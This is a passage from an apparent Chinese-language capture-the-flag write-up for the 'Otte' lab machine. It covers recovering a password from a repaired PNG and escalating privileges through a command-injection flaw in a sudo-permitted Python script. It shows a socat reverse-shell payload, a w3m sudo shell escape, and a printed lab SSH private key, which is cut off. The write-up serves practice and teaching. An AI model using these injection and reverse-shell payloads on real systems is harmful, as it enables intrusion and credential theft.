png<\/code><\/pre>\n<p>\u7ed3\u679c\u5c31\u662f<code>png<\/code>\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u4e0a\u9762\u5c5e\u4e8e\u53d6\u5de7\u505a\u6cd5\uff0c\u4f5c\u8005\u662f\u91c7\u7528\u7206\u7834\u6807\u8bc6\u7136\u540e\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\u7684\uff0c\u5927\u81f4\u6d41\u7a0b\u5982\u4e0b\uff1a<\/p>\n<ul>\n<li>\u6536\u96c6\u5927\u91cf\u6807\u8bc6\u5934\uff0c\u4f7f\u7528\u547d\u4ee4\u8fdb\u884c\u63d0\u53d6<\/li>\n<li>\u4fee\u6539\u683c\u5f0f\u4f7f\u5176\u7b26\u5408\u6587\u4ef6\u5934\u683c\u5f0f\uff08\u5c0f\u5199\uff0c\u56db\u4e2a\u4e00\u7ec4\u7b49\uff09<\/li>\n<li>\u8f6e\u6d41\u63d2\u5165\u6587\u4ef6\u7528sed\u66ff\u6362\u5360\u4f4d\u7b26\uff0c\u5c06\u7ed3\u679c\u653e\u5165\u5355\u72ec\u6587\u4ef6\u5939<\/li>\n<li>\u6253\u5f00\u6587\u4ef6\u5939\u67e5\u770b<\/li>\n<\/ul>\n<p>\u8fd9\u91cc\u54b1\u4eec\u5c31\u4eea\u5f0f\u4e00\u4e0b\u5f97\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ echo &#039;89 50 4E 47 0D 0A 1A 0A&#039; | tr -d &quot; &quot;             \n89504E470D0A1A0A\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ echo &#039;89 50 4E 47 0D 0A 1A 0A&#039; | tr -d &quot; &quot; | sed &#039;s\/.\\{4\\}\/&amp; \/g&#039;  \n# s\/.\\{4\\}\/&amp; \/g \u6bcf\u5339\u914d4\u4e2a\u5b57\u7b26\uff08.\\{4\\}\uff09\u540e\u63d2\u5165\u7a7a\u683c\uff08&amp; \u8868\u793a\u5339\u914d\u5230\u7684\u5185\u5bb9\uff09\n8950 4E47 0D0A 1A0A\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ echo &#039;89 50 4E 47 0D 0A 1A 0A&#039; | tr -d &quot; &quot; | tr &#039;A-Z&#039; &#039;a-z&#039; | sed &#039;s\/.\\{4\\}\/&amp; \/g&#039;\n8950 4e47 0d0a 1a0a<\/code><\/pre>\n<p>\u63d2\u5165\u6587\u4ef6\u5934\u5373\u53ef\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240511.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240511.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618013200482\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8bc6\u522b\u4e00\u4e0b\u5373\u53ef\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240512.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240512.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618013326295\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240513.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240513.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618013400927\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">thomas:youareonthegoodwaybro<\/code><\/pre>\n<p>\u62ff\u5230\u5bc6\u7801\uff01\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240514.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240514.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618013519628\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743laetitia<\/h3>\n<pre><code class=\"language-python\">thomas@otte:~$ sudo -l\nMatching Defaults entries for thomas on otte:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser thomas may run the following commands on otte:\n    (laetitia) NOPASSWD: \/usr\/bin\/python3 \/home\/laetitia\/simpler.py *\nthomas@otte:~$ cat \/home\/laetitia\/simpler.py\n#!\/usr\/bin\/env python3\nfrom datetime import datetime\nimport sys\nimport os\nfrom os import listdir\nimport re\n\ndef show_help():\n    message=&#039;&#039;&#039;\n********************************************************\n* Simpler   -   A simple simplifier ;)                 *\n* Version 1.0                                          *\n********************************************************\nUsage:  python3 simpler.py [options]\n\nOptions:\n    -h\/--help   : This help\n    -s          : Statistics\n    -l          : List the attackers IP\n    -p          : ping an attacker IP\n    &#039;&#039;&#039;\n    print(message)\n\ndef show_header():\n    print(&#039;&#039;&#039;***********************************************\n     _                 _\n ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _\n\/ __| | &#039;_ ` _ \\| &#039;_ \\| |\/ _ \\ &#039;__| &#039;_ \\| | | |\n\\__ \\ | | | | | | |_) | |  __\/ |_ | |_) | |_| |\n|___\/_|_| |_| |_| .__\/|_|\\___|_(_)| .__\/ \\__, |\n                |_|               |_|    |___\/\n                                @ironhackers.es\n\n***********************************************\n&#039;&#039;&#039;)\n\ndef show_statistics():\n    path = &#039;\/home\/pepper\/Web\/Logs\/&#039;\n    print(&#039;Statistics\\n-----------&#039;)\n    listed_files = listdir(path)\n    count = len(listed_files)\n    print(&#039;Number of Attackers: &#039; + str(count))\n    level_1 = 0\n    dat = datetime(1, 1, 1)\n    ip_list = []\n    reks = []\n    ip = &#039;&#039;\n    req = &#039;&#039;\n    rek = &#039;&#039;\n    for i in listed_files:\n        f = open(path + i, &#039;r&#039;)\n        lines = f.readlines()\n        level2, rek = get_max_level(lines)\n        fecha, requ = date_to_num(lines)\n        ip = i.split(&#039;.&#039;)[0] + &#039;.&#039; + i.split(&#039;.&#039;)[1] + &#039;.&#039; + i.split(&#039;.&#039;)[2] + &#039;.&#039; + i.split(&#039;.&#039;)[3]\n        if fecha &gt; dat:\n            dat = fecha\n            req = requ\n            ip2 = i.split(&#039;.&#039;)[0] + &#039;.&#039; + i.split(&#039;.&#039;)[1] + &#039;.&#039; + i.split(&#039;.&#039;)[2] + &#039;.&#039; + i.split(&#039;.&#039;)[3]\n        if int(level2) &gt; int(level_1):\n            level_1 = level2\n            ip_list = [ip]\n            reks=[rek]\n        elif int(level2) == int(level_1):\n            ip_list.append(ip)\n            reks.append(rek)\n        f.close()\n\n    print(&#039;Most Risky:&#039;)\n    if len(ip_list) &gt; 1:\n        print(&#039;More than 1 ip found&#039;)\n    cont = 0\n    for i in ip_list:\n        print(&#039;    &#039; + i + &#039; - Attack Level : &#039; + level_1 + &#039; Request: &#039; + reks[cont])\n        cont = cont + 1\n\n    print(&#039;Most Recent: &#039; + ip2 + &#039; --&gt; &#039; + str(dat) + &#039; &#039; + req)\n\ndef list_ip():\n    print(&#039;Attackers\\n-----------&#039;)\n    path = &#039;\/home\/pepper\/Web\/Logs\/&#039;\n    listed_files = listdir(path)\n    for i in listed_files:\n        f = open(path + i,&#039;r&#039;)\n        lines = f.readlines()\n        level,req = get_max_level(lines)\n        print(i.split(&#039;.&#039;)[0] + &#039;.&#039; + i.split(&#039;.&#039;)[1] + &#039;.&#039; + i.split(&#039;.&#039;)[2] + &#039;.&#039; + i.split(&#039;.&#039;)[3] + &#039; - Attack Level : &#039; + level)\n        f.close()\n\ndef date_to_num(lines):\n    dat = datetime(1,1,1)\n    ip = &#039;&#039;\n    req=&#039;&#039;\n    for i in lines:\n        if &#039;Level&#039; in i:\n            fecha=(i.split(&#039; &#039;)[6] + &#039; &#039; + i.split(&#039; &#039;)[7]).split(&#039;\\n&#039;)[0]\n            regex = &#039;(\\d+)-(.*)-(\\d+)(.*)&#039;\n            logEx=re.match(regex, fecha).groups()\n            mes = to_dict(logEx[1])\n            fecha = logEx[0] + &#039;-&#039; + mes + &#039;-&#039; + logEx[2] + &#039; &#039; + logEx[3]\n            fecha = datetime.strptime(fecha, &#039;%Y-%m-%d %H:%M:%S&#039;)\n            if fecha &gt; dat:\n                dat = fecha\n                req = i.split(&#039; &#039;)[8] + &#039; &#039; + i.split(&#039; &#039;)[9] + &#039; &#039; + i.split(&#039; &#039;)[10]\n    return dat, req\n\ndef to_dict(name):\n    month_dict = {&#039;Jan&#039;:&#039;01&#039;,&#039;Feb&#039;:&#039;02&#039;,&#039;Mar&#039;:&#039;03&#039;,&#039;Apr&#039;:&#039;04&#039;, &#039;May&#039;:&#039;05&#039;, &#039;Jun&#039;:&#039;06&#039;,&#039;Jul&#039;:&#039;07&#039;,&#039;Aug&#039;:&#039;08&#039;,&#039;Sep&#039;:&#039;09&#039;,&#039;Oct&#039;:&#039;10&#039;,&#039;Nov&#039;:&#039;11&#039;,&#039;Dec&#039;:&#039;12&#039;}\n    return month_dict[name]\n\ndef get_max_level(lines):\n    level=0\n    for j in lines:\n        if &#039;Level&#039; in j:\n            if int(j.split(&#039; &#039;)[4]) &gt; int(level):\n                level = j.split(&#039; &#039;)[4]\n                req=j.split(&#039; &#039;)[8] + &#039; &#039; + j.split(&#039; &#039;)[9] + &#039; &#039; + j.split(&#039; &#039;)[10]\n    return level, req\n\ndef exec_ping():\n    forbidden = [&#039;&amp;&#039;, &#039;;&#039;, &#039;-&#039;, &#039;`&#039;, &#039;||&#039;, &#039;|&#039;]\n    command = input(&#039;Enter an IP: &#039;)\n    for i in forbidden:\n        if i in command:\n            print(&#039;Got you&#039;)\n            exit()\n    os.system(&#039;ping &#039; + command)\n\nif __name__ == &#039;__main__&#039;:\n    show_header()\n    if len(sys.argv) != 2:\n        show_help()\n        exit()\n    if sys.argv[1] == &#039;-h&#039; or sys.argv[1] == &#039;--help&#039;:\n        show_help()\n        exit()\n    elif sys.argv[1] == &#039;-s&#039;:\n        show_statistics()\n        exit()\n    elif sys.argv[1] == &#039;-l&#039;:\n        list_ip()\n        exit()\n    elif sys.argv[1] == &#039;-p&#039;:\n        exec_ping()\n        exit()\n    else:\n        show_help()\n        exit()<\/code><\/pre>\n<p>\u8fd9\u662f\u4e00\u4e2a\u5b89\u5168\u65e5\u5fd7\u5206\u6790\u5de5\u5177\uff0c\u4f46<code>exec_ping()<\/code>\u4ec5\u8fc7\u6ee4\u90e8\u5206\u7279\u6b8a\u5b57\u7b26\uff0c\u672a\u8986\u76d6<code>$()<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">thomas@otte:~$ sudo -u laetitia \/usr\/bin\/python3 \/home\/laetitia\/simpler.py -p\n***********************************************\n     _                 _\n ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _\n\/ __| | &#039;_ ` _ \\| &#039;_ \\| |\/ _ \\ &#039;__| &#039;_ \\| | | |\n\\__ \\ | | | | | | |_) | |  __\/ |_ | |_) | |_| |\n|___\/_|_| |_| |_| .__\/|_|\\___|_(_)| .__\/ \\__, |\n                |_|               |_|    |___\/\n                                @ironhackers.es\n\n***********************************************\n\nEnter an IP: $(&#039;\/bin\/bash&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240515.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240515.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618014928895\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743laetitia<\/h3>\n<p>\u7136\u540e\u5c31\u5947\u602a\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">laetitia@otte:~$ ls -la\nlaetitia@otte:~$ ls -la\nlaetitia@otte:~$ pwd\nlaetitia@otte:~$ whoami\nlaetitia@otte:~$ cd ..\nlaetitia@otte:\/home$ ls -la\nlaetitia@otte:\/home$ sudo -l\nlaetitia@otte:\/home\/thomas$ whoami;id\nlaetitia@otte:\/home\/thomas$ cd ..\nlaetitia@otte:\/home$ exit\nexit\nping: groups=1001(laetitia): Name or service not known<\/code><\/pre>\n<p>\u6ca1\u6709\u56de\u663e\u4e86\uff01\uff01\uff01\uff01\uff01\u5c1d\u8bd5\u56de\u53bb\u53cd\u5f39 shell \u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">thomas@otte:~$ sudo -u laetitia \/usr\/bin\/python3 \/home\/laetitia\/simpler.py -p\n***********************************************\n     _                 _\n ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _\n\/ __| | &#039;_ ` _ \\| &#039;_ \\| |\/ _ \\ &#039;__| &#039;_ \\| | | |\n\\__ \\ | | | | | | |_) | |  __\/ |_ | |_) | |_| |\n|___\/_|_| |_| |_| .__\/|_|\\___|_(_)| .__\/ \\__, |\n                |_|               |_|    |___\/\n                                @ironhackers.es\n\n***********************************************\n\nEnter an IP: $(socat TCP:192.168.10.107:2345 EXEC:\/bin\/bash)\nstty: &#039;standard input&#039;: Inappropriate ioctl for device\n\/bin\/bash: line 12: ifconfig: command not found<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240516.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240516.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618015659169\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743cedric<\/h3>\n<pre><code class=\"language-bash\">(remote) laetitia@otte:\/home\/thomas$ sudo -l\nMatching Defaults entries for laetitia on otte:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser laetitia may run the following commands on otte:\n    (cedric) NOPASSWD: \/usr\/bin\/w3m\n(remote) laetitia@otte:\/home\/thomas$ \/usr\/bin\/w3m\nw3m version w3m\/0.5.3+git20190105, options lang=en,m17n,image,color,ansi-color,mouse,gpm,menu,cookie,ssl,ssl-verify,external-uri-loader,w3mmailer,nntp,gopher,ipv6,alarm,mark,migemo\nusage: w3m [options] [URL or filename]\noptions:\n    -t tab           set tab width\n    -r               ignore backspace effect\n    -l line          # of preserved line (default 10000)\n    -I charset       document charset\n    -O charset       display\/output charset\n    -B               load bookmark\n    -bookmark file   specify bookmark file\n    -T type          specify content-type\n    -m               internet message mode\n    -v               visual startup mode\n    -M               monochrome display\n    -N               open URL of command line on each new tab\n    -F               automatically render frames\n    -cols width      specify column width (used with -dump)\n    -ppc count       specify the number of pixels per character (4.0...32.0)\n    -ppl count       specify the number of pixels per line (4.0...64.0)\n    -dump            dump formatted page into stdout\n    -dump_head       dump response of HEAD request into stdout\n    -dump_source     dump page source into stdout\n    -dump_both       dump HEAD and source into stdout\n    -dump_extra      dump HEAD, source, and extra information into stdout\n    -post file       use POST method with file content\n    -header string   insert string as a header\n    +&lt;num&gt;           goto &lt;num&gt; line\n    -num             show line number\n    -no-proxy        don&#039;t use proxy\n    -4               IPv4 only (-o dns_order=4)\n    -6               IPv6 only (-o dns_order=6)\n    -no-mouse        don&#039;t use mouse\n    -cookie          use cookie (-no-cookie: don&#039;t use cookie)\n    -graph           use DEC special graphics for border of table and menu\n    -no-graph        use ASCII character for border of table and menu\n    -s               squeeze multiple blank lines\n    -W               toggle search wrap mode\n    -X               don&#039;t use termcap init\/deinit\n    -title[=TERM]    set buffer name to terminal title string\n    -o opt=value     assign value to config option\n    -show-option     print all config options\n    -config file     specify config file\n    -help            print this usage message\n    -version         print w3m version\n    -reqlog          write request logfile\n    -debug           DO NOT USE<\/code><\/pre>\n<p><strong>w3m\u662f\u4e2a\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u547d\u4ee4\u884c\u4e0b\u9762\u7684\u7f51\u9875\u6d4f\u89c8\u5668<\/strong>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/w3m\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/w3m\/#sudo<\/a><\/p>\n<pre><code class=\"language-bash\">(remote) laetitia@otte:\/home\/thomas$ sudo -u cedric \/usr\/bin\/w3m nightmare.txt -dump\nwho is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8bfb\u53d6<code>id_rsa<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) laetitia@otte:\/home\/thomas$ sudo -u cedric \/usr\/bin\/w3m ..\/cedric\/.ssh\/id_rsa -dump\nw3m: Can&#039;t load ..\/cedric\/.ssh\/id_rsa.<\/code><\/pre>\n<p>\u8bf4\u660e\u53ef\u80fd\u4e0d\u5b58\u5728\u8fd9\u4e2a\u6587\u4ef6\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u6253\u5f00\u7f51\u9875\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) laetitia@otte:\/home\/thomas$ sudo -u cedric \/usr\/bin\/w3m www.baidu.com<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240517.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240517.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618020349391\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u989d\uff0c<code>!\/bin\/bash<\/code>\u5b8c\u6210\u63d0\u6743\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240518.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240518.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618020430077\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240519.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240519.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618020456157\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<pre><code class=\"language-bash\">cedric@otte:~$ ls -la\ntotal 40\ndrwx------ 5 cedric cedric 4096 May 17  2021 .\ndrwxr-xr-x 5 root   root   4096 May 16  2021 ..\nlrwxrwxrwx 1 cedric cedric    9 May 16  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 cedric cedric  220 May 16  2021 .bash_logout\n-rw-r--r-- 1 cedric cedric 3526 May 16  2021 .bashrc\n-rw------- 1 cedric cedric 1811 May 17  2021 id_rsa\ndrwxr-xr-x 3 cedric cedric 4096 May 16  2021 .local\n-rw-r--r-- 1 cedric cedric  807 May 16  2021 .profile\ndrwx------ 2 cedric cedric 4096 May 16  2021 .ssh\n-rwx------ 1 cedric cedric   33 May 16  2021 user.txt\ndrwx------ 2 cedric cedric 4096 Jun 17 20:03 .w3m\ncedric@otte:~$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAs3N375NDi05ezMdlRenK\/QOgHwCFdOQYzZqwZyfpcTbT+H2M2I57\n8TQ7b95W3ix7MrmQ+gtvZzwqb4u4VHV+bY47eXvGhXB+VrbtczqLl47PEVerQlAaeN94oK\nl8G1ZdVinkO72DvsrqgQWnCTZFz1NHtETsFwRVg5JTmMEr50VumIt1SuzELnkID\/t\/moy5\n8KZqTsZ3Yt4QjcDqaVJQzYRJun\/KyeM2rQFzz+UjCKevz93PfEI59Mx3ZCO7d5C+h1Obhs\nELEIt1iRs9fGGr8Mo1x0pUC5cIUwxoDkkOs6ceFie4mO5iv3S9XOwjaBddea6YKh8hSUAn\nZb7ICCfYzQAAA8CcrddwnK3XcAAAAAdzc2gtcnNhAAABAQCzc3fvk0OLTl7Mx2VF6cr9A6\nAfAIV05BjNmrBnJ+lxNtP4fYzYjnvxNDtv3lbeLHsyuZD6C29nPCpvi7hUdX5tjjt5e8aF\ncH5Wtu1zOouXjs8RV6tCUBp433igqXwbVl1WKeQ7vYO+yuqBBacJNkXPU0e0ROwXBFWDkl\nOYwSvnRW6Yi3VK7MQueQgP+3+ajLnwpmpOxndi3hCNwOppUlDNhEm6f8rJ4zatAXPP5SMI\np6\/P3c98Qjn0zHdkI7t3kL6HU5uGwQsQi3WJGz18YavwyjXHSlQLlwhTDGgOSQ6zpx4WJ7\niY7mK\/dL1c7CNoF115rpgqHyFJQCdlvsgIJ9jNAAAAAwEAAQAAAQBnJNZqEMYA+yHIKE\/Q\neInhFcViLGWJA1YyT1hXYnxuQ2pg6KEdFACvaitDqJNbjkudo0VuQ0ZcGxv1E2T2vrXVeK\nw8rmUz663iX7Bpy9vSWBYyzKY2Ll6Y3TGzftdDy0dIsDlsEQj5kB5r3Hje9Z\/4g9CyD+93\nZ1lTj7aXFWkLu0kA3effLft3QawYLEOBn6SMLxNe1ap9IqZVwXLzBbtlXQglr4RnMQUIdl\n\/RK5vZdjGstck2zeC61sZqPpkoIJ0vb\/02CEKNU5wcZUbwmL7iCJlkzQnKHosmTVKv6m6D\nnZE6YicYYwXU\/lWaIm9bZSgh+XSu3MNd9Q4OjysM+uwNAAAAgQCT6o1Zbmud8n5Ly98Ixt\nj8dMGfOQWIUQ9ufjXbwoVAwggBoO93Ozmj2Ro4yWcUl+5rPIJymzPQt6wCwN1y9P0qrrQr\nYFxplOjuGzPbNodZm9WcterJDcCw51mMPkbqERBAgKggjnnFRRTZZgYKbQZITee+LQmWDw\nn6owBoop8e+AAAAIEA4yBD324kr4sYaSdywvM0cnGPAOWTM5GBRNiDaxtQWk9BV9lv9+14\n1H2p2P979TgHSqbG8yROg3AHVoiH1aKWrwZI9UQduWW3bOrMDFHymlb\/rPcSV37ZjVi9RD\nSaofRX4oIdI+6G0KiACToB0Vs4bAzvQepIb84BXNO8483bKd8AAACBAMpDo1xjQzhwJ5z4\n9uqfdCDXfXbQNuDSProTh6oaXCS53B\/ElrQ9clAf5FzGskioqKNIo+LGgKcDEixexb68dw\n0azr6obsElQf9VwI+xVl5iRx+RMjL27swjGkDarDoMbHFzaTSdEee0wIGLId\/yKLCqGRnw\nb